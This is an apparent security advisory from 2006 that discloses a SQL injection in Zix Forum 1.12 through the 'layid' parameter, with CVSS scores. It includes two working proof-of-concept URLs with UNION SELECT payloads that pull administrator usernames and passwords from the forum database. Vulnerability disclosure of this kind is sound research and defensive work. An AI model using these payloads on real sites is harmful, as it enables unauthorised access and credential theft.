Zix Forum <= 1.12 (layid) SQL Injection Vulnerability

2006.05.25
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Zix Forum <= 1.12 (layid) SQL Injection Vulnerability Vulnerability: -------------------- SQL_Injection: Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation extracts username and password of administrator in clear text . Proof of Concepts: -------------------- site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,n ull,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1' site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1 ,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1 ,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1' ------- By PHP Emperor # i6d[at]hotmail[dot]com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top